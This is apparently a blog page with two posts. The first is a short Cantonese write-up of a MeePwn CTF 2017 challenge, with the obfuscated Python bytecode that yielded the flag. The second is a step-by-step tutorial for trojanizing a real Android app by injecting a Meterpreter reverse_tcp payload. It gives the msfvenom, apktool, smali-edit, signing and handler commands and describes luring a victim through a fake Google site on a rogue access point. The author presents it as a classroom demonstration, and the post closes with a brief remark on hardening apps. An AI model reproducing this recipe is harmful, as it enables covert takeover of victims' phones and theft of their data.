MeePwn CTF 2017 - 4lph4||g4mm4

呢個so-call Binary Challenge, download個challenge落黎, run都費事run, 開黎係一個有好多 \x乜乜嘅python program.

目測幾次, 見到個 underscore function "_" 成日俾人用, 咁就抽左啲call "_" 啲line, 試下print 出黎望下.

點知... 就咁出左條 flag :/

MeePwnCTF{FunnywithPython}

code:

import re import types import dis from sys import getsizeof, stdout from ctypes import c_byte ''' global main main = types.FunctionType( types.CodeType( 0, 11, 11, 67, 'qr\x03\xa8\x80\xc3E\xa1\xe9~\xb3\xb0\x1bho\x9c\xc6\x84\xc3v\xdf\xb06\xc7\xb0\x1b\x06i\x9c\xbd\xd5\xdeb\xca`\xfd\xb3\xb0ulo\x8c\xea\xdc\xe4D\xd5\xe8~\xd9\xb1\x1b\x06j\x9c\xcc\x97\xe1R\x99j~\xb3\xde\x19h\x16\xbe\xd5\x80\xc31\xa3\xe9\x10\xb4\xb0w$\x1a\xb0\xa0\x84\xdd/\xa2\xe9\x10\xb4\xb0\x98\x16T\xfe"\xf6\xda!\xa0\xe9\xfd\xb2\xb0u`o\xfe\xaa\x92\x94g\x8f\xff`\xb2\xc9-j\x1b\x98\xa8\x03\xc3E\xcf\xec~\xd2\xa3A\n\xee\x9d\xdc\x85\xc3+\xa4\xe9F\xa6\xea\x15\x07\x1d6\xa8\xee\xc7E*\x94W\xde\xc4\x1dh\xec\x9c\xa8\xee\xc0E\x8f\xba%\xb2\xde\x1bh\x1b\x9b\xa8\xe4\xc1E\xd5\xe1~\xdd\xb3\x1bo*\x17+\x80\xc2D\xcf\xe0~2\xc2DCS\xfb\x8e\x98\xb41\xa8\xe9\x10\xbb\xb0?N\x01\x8d\x9d\x01\xdd \xc5\xea~\xdd\xb3\x1bS\x0e\xd3\xdc\x88\xc3+\xa2\xe9[\xcd\xb5\x98hn\xf2\xac\x80\xeft\xe4\xa5\x7f\xdd\xb7\x1b\x07\xeb\x97\xc7\xb6\x97.\xd5\xe3~\xd7\xb2\x1b\x06m\x9c\xdd\x98\xb7M\xa1j~\xb2\xb1c\xfdn\xe8\xa3\x80\xad@\xa1\x9e2\xda\xcb@\x1a\xcf\x9e\xdc\x8c\xc3\xc6\xa1\xe9\x10\xb4\xb0;1{\x91\xc3\xe5\xd28\xa0\xe9\x10\xb7\xb0k\x02 \x92\xd4\x81\xc3!\xa1\xe9\x15\xba\xb0i[m\xf2\xa9\x80L1\xaf\xe9\x10\xb4\xb0@ Y\xab\xd1\x88\x8c9\xa0\xe9\x10\xb4\xb0U\x10\x07\xb3\xbc\xe5\xce\xc6\xa0\xe9\x10\xb1\xb0\x08\x14\x12\x9e\xa8\xee\xc0E\xfb\x89C\xd7\xb4\x1b\x06f\x9c\x98\x02\xab\xc1\xa3\x88\x06\xa9\x98gjo\x98\xab\xeb\xc2E\xcf\xeb~7\xd5t\xc0n\xf8\xad\x80\xadB\xa1\xfaA\xff\xcc+ B\xf7\xa9\x80\xadG\xa1\xeb\x7f\xc1K\x1a\x06m\x9c\x86\x00\xb7J\xa1\x9dn\xb3\xde\x1ah\xeb\x1f\xa9\x80\xa7C\xa1\x82~\xb3\xde\x1fh0\xd3\x9a\xc9\xb1i\xa3\x9dn\xb3\xde\x1ehv\xe5\x84\x04E9\xa0\xe9I\xdd\xb9\x1b!\x0c\xee/\xc9\xcf\x1b\xbd\x8d\x1f\xa3\xb0umo\xc8\xc8\r\x81Q\xd0\xc5|\xc2\x83\x19\x14m\x9c\xcc\x8b\xc3+\xa0\xe95\xd8\xb6\x1b\x06l\x9c\xeb\xf3\xb37\x92\xeb\x10\xb4\xb0\x03y#\xb8\xd1\xc7\xb51\xb1\xe9\x1a\xba\xb0;\t\x7f\x9c\xd9\xb3\xc1+\xa0\xe9\x04\xdd\xb4\x1b\x06n\x9c\xa4\xf4\xc2E\xcf\xec~\x8b\xf4+w\xe4\xf6\xa9\x80@E\xa1\x87x\xb3\x8ac-I\xa4\xe2\xfc\xc3E\xb9\x87z\xb3\xba\x9dgL\xe1\xab\x80\xadF\xa1\xcf\xf76\xc4\nh\x01\x95\xa8\x89\x82R\x89\x84\x16\x97\x99r\x14l\x9c\xc6\x89\xc3D\xac\xf5I\xec\xd4"i5\x1f\xa9\x80\xc2+\xa0\xe99\xc7\xb1\x1b\x06i\x9c\xdb\x05\xb5Y\x91\xe5\x14\xa1\xb0\x7fbo\x1f\xa9\x80\xc24\xb2\xe8)\xdd\xb4\x1b$\x13\xfa-\xd7\xad\xf1\xa1\xed\x10\xb6\xb0\x96\x07\x18\xb1\x8b\xf4\xd0E\xcf\xed~\xb3>Go\x04\x96\xa8\xee\xcbE\xcf\xd4w\x94\xfe\x95m2\xee\xf7\x83\xc2+\xa7\xe9}\xac\xee\x00;|\x9d\xc6\x81\xc3y\xa0\x87}\xb3\x9a\x0f{\x1b\x96\xa8\xee\xcaE\xa3\xff4\xc7\x81S3u\x81\xcc\x82\xc31\xaa\xe9\x10\xb6\xb0\x07\x7fK\xd4\xdc\x03\xc3D\xcf\xed~\x8f\xedLbn\xe8\xa1\x80\xadG\xa1\x83\x0b\xd7\xb3\x1b\x1cd\x9c+\x80\xc2D\xd5\xee~\xd7\xb2\x1b\x1cd\x9c\xc6\x82\xc3*\xa4j~\xb2\xb1uno\xa9\xe3\xa3\xa3v\xed\x9d{\xb3\xc2{k\x1b\x88\xa8\x03\xc3E\xa0\x87v\xb3\xa1KH\x11\xaa\xc8\x8a\xfb4\xc1\xea\x10\xb4\xb0uko\x1d\xca\xd9\x9b!\xa1\xe9\x10\xba\xb0f\xe6r\x16\x9b\xd8\x88\xc3\xd9\x98\x0b\xb0n\x03\x00n\x00\x00n\x05\x00%\x0e\x12E\x19t\x15\x00t\x16\x00n\x08\x00\x02|D}\x05z+Ld\r\x00n\x03\x007]3t\x17\x00\x83\x03\x00n\x01\x00\x10}\x04\x00t\x16\x00j\x18\x00n\x01\x00Ij\x19\x00}\x05\x00n\x03\x00"\x06Ut\x1a\x00n\t\x00Ww r|\x1a\x0c/&d\x0e\x00n\x03\x00y~Y\x83\x01\x00d\x0f\x00n\t\x009\x0co\x11\x12L\x1f\x82\x03\x18n\x02\x00t^}\x06\x00n\t\x00)_H\x15\x14\x00O\nJt\x1b\x00t\x1c\x00|\x05\x00\x83\x01\x00n\x06\x00wXte\x83\x11\x14j\x1d\x00n\x02\x0048t\x1e\x00n\x01\x00U|\x05\x00n\x05\x00a*\x07g{\x83\x01\x00n\x04\x00I@P3|\x06\x00n\x03\x00,,}\x17n\x01\x00\x0e\x83\x01\x00n\x02\x00"\x7f}\x07\x00t\x1f\x00n\x06\x00=G\x16f}Ft \x00|\x05\x00d\x10\x00d\x11\x00n\x03\x00B\nO!n\x06\x00R,[_\\Z\x83\x02\x00n\x06\x00\x8dg,\x8d>H}\x08\x00d\x12\x00n\t\x00\x15SY\ny\x0f\x08.Q}\t\x00d\x13\x00}\n\x00n\x08\x00:E!"t;\x83Fx\x86\x00|\n\x00n\x04\x00cY?~|\t\x00k\x00\x00r1\x05|\x07\x00d\x15\x00n\x08\x00]U\x1e%kOsE|\n\x00\x17c\x02\x00\x19n\x08\x00\x84?\x17L\x83\x08w$|\x08\x00n\x08\x00(\x8b)HC\x0crv|\n\x00d\x14\x00n\x01\x00M\x16\x19n\x04\x00G\x14\x16\x1eNn\t\x00\x1co2\x89\x8c`x!\x1f\x03n\x07\x00g\x1f1\x860\x874<|\n\x00d\x0f\x007n\x04\x00D\x1c$\x05}\n\x00q\xac\x04W|\x04\x00sp\x05t!\x00t\x16\x00d\r\x00t\x17\x00n\x01\x00\x00\x83\x03\x00n\x05\x00\x1eZ6Z\x0e\x01n\x04\x00\x00\x18;*\tn\x06\x00\x8b@\tc\x08K\tn\x05\x00=\x8bOK\x11\tSt!\x00t\x16\x00d\r\x00n\t\x00dO\rC\x1bz\x1caqt"\x00\x83\x03\x00\x01n\x04\x00q+\x18\x00d\x0c\x00q\x10\x00', (None, _('p\n\xdc\x86\x00\x05\xab\xcf\xc8\xc9,\xa8\x08\xc9,\xcf,\xab\xcb\xcd+v\xabq\x0es\xcf(\rMM\xf3\x9cx'), _('\xc2\x01]\x04\x00\x07/\xc8\xce+\x9cx'), _('\xde\x00N\x01\x00\x03\xcf\xcb\x9cx'), 32, 126, 26, 8, 127, -1, 0.01, (8, 127), None, _('f\x00f\x00\x00\x05K\x9cx'), _('\x01\x00\x00\x00\x00\x03\x9cx'), 1, 3, 16, 866, 0, 13, 16), (_('Y\x04e\x19\x00\x06)\xccJO\xc9\xcfq,\xcb\xcc\xf3\x9cx'), _('\xb0\x01N\x04\x00\x05M\xcc\xc9+\x9cx'), _('\xdc\x02|\x0b\x00\x02L\xc9\xc8\xce,H\xcb\x9cx'), _('\x07\x01G\x02\x00\x051M\xcb\x9cx'), _('\xba\x02\x90\n\x00\x00\xabOq,\xcb\xcc\xf3\x9cx'), _('\x91\x01\xb6\x04\x00\x01\x0b\xf3\xf4\xf7\x0b\x9cx'), _('\x92\x05\x14)\x00\x05K,\xc8\xceJ,uI)-I\xccH\x0b\x9cx'), _('\xc5\x04\x97\x1d\x00\x02/\xce*-.uOK\xccH\xces\x9cx'), _('\xec\x01v\x05\x00\x05N)\xccKs\x9cx'), _('\xdf\x05\x87-\x00\x07K\xcc\xca-KKM*uOK\xccH\xces\x9cx'), _('\xc6\x039\x14\x00\x07\xc8\xceMuOK\xccH\xces\x9cx'), _('\xa1\x01\xf9\x03\x00\x05M*)\x0b\x9cx'), _('\x8d\x042\x1d\x00\x02,H\xceq-OuJL\xacM\xf3\x9cx'), _('\x91\x01\xca\x03\x00\x05K\xcf\xcb\xf3\x9cx'), _('F\x01\x98\x02\x00\x01J/\xcb\x9cx'), _('@\x01\x7f\x02\x00\x03\xcdI\xcb\x9cx'), _('\x91\x01\x98\x04\x00\x01\r\x08\x0b\xf4\xf3\x9cx'), _('&\x01\x1c\x02\x00\x00\xabOs\x9cx'), _('\x1a\x02]\x06\x00\x00-MI\xce+\x9cx'), _('\xff\x06\x0c=\x00\x01(-**-I+\xcc\xf1J,O\xcaL\xadN\xf3\x9cx'), _('\xb4\x05\xc7)\x00\x05J/\xc9.-J\rI)-I\xccH\x0b\x9cx'), _('\xfc\x02\xb4\x0b\x00\x02)),I-OK\x9cx'), _('\xa6\x01\x1b\x04\x00\x03\xcc\xccM\xcb\x9cx'), _('\xa1\x01\xf9\x03\x00\x05M*)\x0b\x9cx'), _('\xa7\x03|\x12\x00\x05IO\xceO\x8eK\xcd+K\x9cx'), _('\xcd\x027\x0b\x00\x05IO\xceO\x8f\xceK\x9cx'), _('\xd1\x03\x16\x13\x00\x03O\xcdJ\xac\xce)-OK\x9cx'), _('w\x02s\x08\x00\x05I,\xaaO\x8eK\x9cx'), _('@\x01\x7f\x02\x00\x03\xcdI\xcb\x9cx'), _('\xfa\x04 \x00\x06.-J)ILO\x8d\xcf\xca+K\x9cx'), _('\xce\x008\x01\x00\x01L\xcb\x9cx'), _('?\x01|\x02\x00\x00,M\xcb\x9cx'), _('F\x01\x98\x02\x00\x01J/\xcb\x9cx'), _('\x08\x03\x08\x0c\x00\x02)),I-N+\x9cx'), _('\xec\x01v\x05\x00\x05N)\xccKs\x9cx')), (_('\x10\x04\x8c\x16\x00\x05N,JO\x8dM\xcc\xc9+K\x9cx'), _('\xcc\x000\x01\x00\x00\xceK\x9cx'), _('p\x00p\x00\x00\x07\xcb\x9cx'), _('\x16\x02M\x06\x00\x05M\xcc\xc9+K\x9cx'), _('"\x02\x84\x06\x00\x05I,I.+\x9cx'), _('d\x00d\x00\x00\x06K\x9cx'), _('<\x01\x82\x02\x00\x03KO\xcb\x9cx'), _('W\x01\xad\x02\x00\x02)(+\x9cx'), _('J\x01\x87\x02\x00\x04\xadN\xcb\x9cx'), _('\xee\x00b\x01\x00\x02\xae+\x9cx'), _('j\x00j\x00\x00\x04\xcb\x9cx')), '', '', 0, '' ), globals() ) ''' _ = types.FunctionType( types.CodeType( 1, 9, 17, 67, 'q\xeb\x00\xe95a\xb3\xcd\x83\x1ah\xfe\xbf\x98\xce\xfb\x955a\xd7\xcd\x83~h\xfe\xd1\x9a\xce\xdc\xebQ`\xb3\xa3\x84\x1a-\x8d\xb6\xbe\xa6\xb0\x80\xb0b\xb3\xa3\x84\x1a!\xf0\xf2\xf2\x84\x7f\xf8,\x0f\xba\xcd\x84{6\xec\xbb\xbf\x96\xbf\xe6_a\xb3\xa9\x81\x1a\x06\xfb\xbf\xe2\x83\xdb\xd8\xb7\x0b\xb2\xcd\xe4\x1ah\x90\xb7\x98\xda\xd8\xa9\x1a?\xb7\xb7\xff~k\xfe\xd1\x9a\xce\xf1\xa6Qe\xb3\xa3\x8a\x1a/\xcb9\x8d\xf8\xa3\xcc`\x0e\xd7\xc8\x83~n\xfe\xdb\x9f\xce\x95\xea5u\xec\xba\xe7\x12h\x9a\xb6\x98\xaa\xf1\xe9[e\xb3\xe8\x85Ar\x99\xb7\x98\xaa\xfb\xe9[h\xb3\xd6\xb0\x985\xba\x93\xe8\xa7\x83\x8d5a\xd7\xc6\x83to\xfe\xff\x90\xa7\xa0\xa1g}6\xce\x83\x03,\xa3\xa7\x98\xa0\xf8\xe9Ub\xb5\xb0\x82\x1a\x1c\xfc\xbf\xe4\xcf\xfbj4a\xed\xcf\x83k\xa9\xfe<\x99\xcex\xe85\x0f\xb0\xcd\xb7A\x1e\x8fQ\x98n\x03\x00n\x00\x00t\x03\x00n\x03\x007\'\x86t\x04\x00n\x03\x00\x853Pd\r\x00t\x05\x00\x83\x03\x00n\x02\x00\x14>}\x02\x00n\x02\x00nmt\x04\x00j\x06\x00n\x04\x00s*A1j\x07\x00n\x05\x00{ea\x84\'}\x03\x00t\x08\x00d\x0e\x00n\x08\x00 \\T\x047\x88\x15x\x83\x01\x00d\x0f\x00n\x08\x00 \x83gr32"(\x18}\x04\x00n\t\x00%N@@\x8dNK%\x83t\t\x00t\n\x00|\x03\x00n\x05\x00W\x1e\x1a\x173\x83\x01\x00n\x05\x00\n\rU{\x1b\x14j\x0b\x00n\x05\x00-\x181>\x16t\x0c\x00n\x04\x00~+\x8f\r|\x03\x00n\x02\x00\\\x1b\x83\x01\x00n\t\x00_\x1f*\x18rq\x0b\x18\x0f|\x04\x00\x17n\x05\x00j\x8aI\x1cz\x83\x01\x00}\x05\x00t\r\x00n\x05\x00Sk\x1aO/t\x0e\x00n\x08\x00\x01$\x8c%beO8|\x03\x00d\x10\x00d\x11\x00n\x02\x00|j!\x83\x02\x00n\x01\x001}\x06\x00d\x12\x00}\x07\x00n\x07\x00\x0e\x03ew9\x07<d\x13\x00n\x05\x00*\x84$P]}\x08\x00n\x07\x00\x1a\x1fv1fovxj\x00|\x08\x00|\x07\x00k\x00\x00r~\x02|\x05\x00d\x15\x00n\x03\x00?\x14\x08|\x08\x00\x17c\x02\x00\x19|\x06\x00n\x02\x00B8|\x08\x00n\x05\x00r\x15\x82\x00(d\x14\x00\x16\x19Nn\x03\x00I8%\x03n\x04\x00,\x0b~O<|\x08\x00n\x04\x00q\x00b,d\x0f\x007n\x01\x00m}\x08\x00q\x1e\x02Wn\x06\x00]5\x7f\x1d\x83o|\x02\x00s\xd8\x02n\x03\x00(\x1fNt\x0f\x00t\x04\x00n\x08\x00%YIIBp\\[d\r\x00n\x04\x00\x1f,vJt\x05\x00n\t\x00z\x01F\ti\x11}nv\x83\x03\x00\x01\t\t\tn\x07\x00\x80\x0e@,\x811NSn\x05\x00\x87\x8d\'d6t\x0f\x00n\x04\x00s8\x18\x17t\x04\x00n\x07\x00\x19|Df\x1b\x8e\x05d\r\x00t\x10\x00\x83\x03\x00n\x01\x00D\x01d\x0c\x00q\x10\x00', (None, -1, '', 99, 98, 102, 105, 104, 108, 111, 122, -2, None, 'e', '', 1, 3, 16, 219, 0, 13, 16), ('decode', 'join', 'chr', 'getattr', '_', 'True', 'func_code', 'co_code', 'getsizeof', 'c_byte', 'len', 'from_address', 'id', 'map', 'ord', 'setattr', 'False'), ('s', 'x', 'state', 'c', 'off', 'ptr', 'key', 'sz', 'i'), '', '', 0, '' ), globals() ) print 'main' print (None, _('p\n\xdc\x86\x00\x05\xab\xcf\xc8\xc9,\xa8\x08\xc9,\xcf,\xab\xcb\xcd+v\xabq\x0es\xcf(\rMM\xf3\x9cx'), _('\xc2\x01]\x04\x00\x07/\xc8\xce+\x9cx'), _('\xde\x00N\x01\x00\x03\xcf\xcb\x9cx'), 32, 126, 26, 8, 127, -1, 0.01, (8, 127), None, _('f\x00f\x00\x00\x05K\x9cx'), _('\x01\x00\x00\x00\x00\x03\x9cx'), 1, 3, 16, 866, 0, 13, 16), print (_('Y\x04e\x19\x00\x06)\xccJO\xc9\xcfq,\xcb\xcc\xf3\x9cx'), _('\xb0\x01N\x04\x00\x05M\xcc\xc9+\x9cx'), _('\xdc\x02|\x0b\x00\x02L\xc9\xc8\xce,H\xcb\x9cx'), _('\x07\x01G\x02\x00\x051M\xcb\x9cx'), _('\xba\x02\x90\n\x00\x00\xabOq,\xcb\xcc\xf3\x9cx'), _('\x91\x01\xb6\x04\x00\x01\x0b\xf3\xf4\xf7\x0b\x9cx'), _('\x92\x05\x14)\x00\x05K,\xc8\xceJ,uI)-I\xccH\x0b\x9cx'), _('\xc5\x04\x97\x1d\x00\x02/\xce*-.uOK\xccH\xces\x9cx'), _('\xec\x01v\x05\x00\x05N)\xccKs\x9cx'), _('\xdf\x05\x87-\x00\x07K\xcc\xca-KKM*uOK\xccH\xces\x9cx'), _('\xc6\x039\x14\x00\x07\xc8\xceMuOK\xccH\xces\x9cx'), _('\xa1\x01\xf9\x03\x00\x05M*)\x0b\x9cx'), _('\x8d\x042\x1d\x00\x02,H\xceq-OuJL\xacM\xf3\x9cx'), _('\x91\x01\xca\x03\x00\x05K\xcf\xcb\xf3\x9cx'), _('F\x01\x98\x02\x00\x01J/\xcb\x9cx'), _('@\x01\x7f\x02\x00\x03\xcdI\xcb\x9cx'), _('\x91\x01\x98\x04\x00\x01\r\x08\x0b\xf4\xf3\x9cx'), _('&\x01\x1c\x02\x00\x00\xabOs\x9cx'), _('\x1a\x02]\x06\x00\x00-MI\xce+\x9cx'), _('\xff\x06\x0c=\x00\x01(-**-I+\xcc\xf1J,O\xcaL\xadN\xf3\x9cx'), _('\xb4\x05\xc7)\x00\x05J/\xc9.-J\rI)-I\xccH\x0b\x9cx'), _('\xfc\x02\xb4\x0b\x00\x02)),I-OK\x9cx'), _('\xa6\x01\x1b\x04\x00\x03\xcc\xccM\xcb\x9cx'), _('\xa1\x01\xf9\x03\x00\x05M*)\x0b\x9cx'), _('\xa7\x03|\x12\x00\x05IO\xceO\x8eK\xcd+K\x9cx'), _('\xcd\x027\x0b\x00\x05IO\xceO\x8f\xceK\x9cx'), _('\xd1\x03\x16\x13\x00\x03O\xcdJ\xac\xce)-OK\x9cx'), _('w\x02s\x08\x00\x05I,\xaaO\x8eK\x9cx'), _('@\x01\x7f\x02\x00\x03\xcdI\xcb\x9cx'), _('\xfa\x04 \x00\x06.-J)ILO\x8d\xcf\xca+K\x9cx'), _('\xce\x008\x01\x00\x01L\xcb\x9cx'), _('?\x01|\x02\x00\x00,M\xcb\x9cx'), _('F\x01\x98\x02\x00\x01J/\xcb\x9cx'), _('\x08\x03\x08\x0c\x00\x02)),I-N+\x9cx'), _('\xec\x01v\x05\x00\x05N)\xccKs\x9cx')), print (_('\x10\x04\x8c\x16\x00\x05N,JO\x8dM\xcc\xc9+K\x9cx'), _('\xcc\x000\x01\x00\x00\xceK\x9cx'), _('p\x00p\x00\x00\x07\xcb\x9cx'), _('\x16\x02M\x06\x00\x05M\xcc\xc9+K\x9cx'), _('"\x02\x84\x06\x00\x05I,I.+\x9cx'), _('d\x00d\x00\x00\x06K\x9cx'), _('<\x01\x82\x02\x00\x03KO\xcb\x9cx'), _('W\x01\xad\x02\x00\x02)(+\x9cx'), _('J\x01\x87\x02\x00\x04\xadN\xcb\x9cx'), _('\xee\x00b\x01\x00\x02\xae+\x9cx'), _('j\x00j\x00\x00\x04\xcb\x9cx')), print ''

Injecting Meterpreter payload to an existing APK

From the previous blog entry about Fake AP, we could control whatever websites (by setting the fake host table), so we could modify the website that user likes to visit, and lure him to download a modified apk.

In dnsmsaq.conf, we can add fakehost file so that the connected clients will visit our "modified" websites if they type those domains

here is the fake Google website at localhost

Anyway, let's see the main dish, how to inject Meterpreter payload to an existing apk.
We will need:
- Kali Linux (easiest to setup, or other OS you feel comfortable)
- apktool 2.2.2 (latest version)
- Signapk.jar
- A working apk (we picked BeautyCam here)

1.) Create Meterpreter apk with following command
msfvenom -p android/meterpreter/reverse_tcp lhost=10.0.0.1 lport=4444 R > msf.apk

an apk will be created, if you simply sign this apk, open a meterpreter handler and install to your android phone, once it's running, the phone will be connecting to the handler and you own the phone

2.) decompile the msf apk, as we want to get the payload smali
../apktool d msf.apk

3.) Get the apk that you want to inject, and decompile it
../apktool d meitu.apk

4.) So let's locate the payload smali, "/msf/smali/com/metasploit/stage",
you have to copy a.smali, b.smali, c.smali, d.smali and Payload.smali

we need to copy whole folder "/com/metasploit/stage" to our target

the most important steps:

Copy the permissions from msf's Manifest xml, and copy them to Meitu's
Then locate the MainActivity from Meitu's Manifest.xml

com.meitu.meiyancamera.MyxjActivity

then we go to /com/meitu/meiyancamera/MyxjActivity.smali, and find " onCreate(Landroid/os/Bundle;)V"

add the Metasploit payload after it

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

5.) Then we build the meitu apk (just ignore the warnings)
../apktool b meitu

6.) Sign the apk
java -jar ../signapk.jar ../certificate.pem ../key.pk8 meitu/dist/meitu.apk meitu-signed.apk

7.) copy it to our website

8.) setup Meterpreter Handler

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 10.0.0.1
set lport 4444
exploit

9.) Fake Google website from victim, and lure him to download the App (of course in reality, this is not likely to happen to popup and ask for a download)

10.) It asks for all access rights, normally people just go ahead

11.) Install and run BeautyCam as usual

12.) On our side, we owned the phone already :)

Afterall, injecting Meterpreter or other payloads to an existing apk is not rocket science, it is more important for us to think about how to harden the apk, so that it is more difficult to recompile, or any other integrity check, binary check etc...

This is the video demo that I show to the students, about the interaction between the Victim and Hacker :)